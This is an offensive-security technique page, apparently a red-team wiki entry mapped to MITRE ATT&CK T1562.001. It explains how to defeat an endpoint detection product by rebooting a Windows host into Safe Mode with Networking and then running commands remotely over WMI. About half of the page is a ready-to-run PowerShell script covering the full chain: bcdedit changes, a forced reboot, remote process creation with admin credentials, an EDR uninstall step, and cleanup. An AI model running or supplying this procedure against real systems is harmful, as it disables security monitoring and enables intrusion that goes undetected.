Safe Mode With Networking
MITRE ATT&CK™ Impair Defenses: Disable or Modify Tools - Technique T1562.001
Last updated
Safe Mode with Networking is a diagnostic way to start a Windows computer when it is experiencing significant problems. This mode loads only the basic files, services and drivers needed for the operating system to function, while still enabling networking.
EDR drivers and user-mode components are therefore not loaded in Safe Mode, but the host remains reachable over the network.
Bypassing an EDR with the following method requires a reboot, which is poor OPSEC: the restart is visible to any logged-on user and to central logging, and a host that comes back in Safe Mode is an obvious indicator.
On the target, use bcdedit to select Safe Mode with Networking for the next boot, then reboot the host. This requires local administrator rights. Before rebooting, check the SafeBoot\Network key under HKLM\SYSTEM\CurrentControlSet\Control: every service or driver registered there is still loaded in Safe Mode with Networking, so a product that has registered itself there will not be bypassed by this technique.
After the reboot, the target will only have RPC ports open. Execution methods that depend on other services (SMB, WinRM) should not be assumed to work, so confirm what is listening before choosing one.
Remote WMI execution (DCOM, which rides on RPC) gives code execution on the system. Since the EDR has not been loaded, we can attempt to uninstall it or perform actions that would normally be blocked. Afterwards, delete the safeboot value from the BCD store and reboot again; otherwise the host keeps starting in Safe Mode on every boot.
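The full procedure (pre-reboot check, switching to Safe Mode with Networking, executing over WMI, and cleaning up) as PowerShell, added here as a worked example and not taken from the original page. `$Target`, `$Cred` and `$EdrServicePattern` are placeholders, and the service-name pattern is an assumption to be tuned to whatever product is actually on the host.

```powershell
# Added example, not from the original page. Assumes local admin on the
# target and a reachable RPC endpoint. $Target, $Cred and $EdrServicePattern
# are placeholders (assumptions), not values from the page.

# ---- Stage 1: run on the target (existing access), before the reboot ----

# Anything registered under SafeBoot\Network is still loaded in Safe Mode
# with Networking. If the EDR's service or driver name shows up here,
# this technique will not unload it and there is no point rebooting.
$safeBootKey       = 'HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\Network'
$EdrServicePattern = 'edr|sensor|agent'   # assumption: replace with the real service/driver names
Get-ChildItem $safeBootKey |
    Where-Object { $_.PSChildName -match $EdrServicePattern } |
    ForEach-Object { Write-Warning "Still loaded in Safe Mode: $($_.PSChildName)" }

# Record the current boot entry so the original state is known for cleanup.
bcdedit /enum '{current}'

# Select Safe Mode with Networking for the next boot, then restart now.
# Note the quotes: in PowerShell a bare {current} is parsed as a script block.
# The reboot itself is the OPSEC cost of this technique.
bcdedit /set '{current}' safeboot network
shutdown /r /t 0

# ---- Stage 2: run from the operator host once the target is back up ----
$Target = '10.0.0.5'                              # assumption: target IP
$Cred   = Get-Credential 'CORP\Administrator'     # assumption: local admin credentials

# Only RPC is expected to be listening; confirm TCP 135 before relying on
# DCOM, and do not assume SMB- or WinRM-based tooling will work.
if (-not (Test-NetConnection -ComputerName $Target -Port 135).TcpTestSucceeded) {
    throw "RPC endpoint mapper on $Target not reachable"
}

# Invoke-WmiMethod uses DCOM (RPC) by default, which matches what is open.
$r = Invoke-WmiMethod -ComputerName $Target -Credential $Cred `
        -Class Win32_Process -Name Create `
        -ArgumentList 'cmd.exe /c whoami > C:\Windows\Temp\out.txt'
if ($r.ReturnValue -ne 0) { throw "Win32_Process.Create failed with code $($r.ReturnValue)" }
"Spawned PID $($r.ProcessId) on $Target"

# ... EDR uninstall or other normally-blocked actions go here ...

# Cleanup: remove the safeboot flag, or the host keeps booting into Safe Mode
# (a loud indicator), then restart back into normal mode.
Invoke-WmiMethod -ComputerName $Target -Credential $Cred `
    -Class Win32_Process -Name Create `
    -ArgumentList 'cmd.exe /c bcdedit /deletevalue {current} safeboot && shutdown /r /t 0'
```

`Win32_Process.Create` returns 0 on success and a non-zero code otherwise (for example 2 for access denied); checking it avoids silently assuming the EDR uninstall ran. The cleanup command is issued through cmd.exe so the `{current}` braces are passed to bcdedit literally.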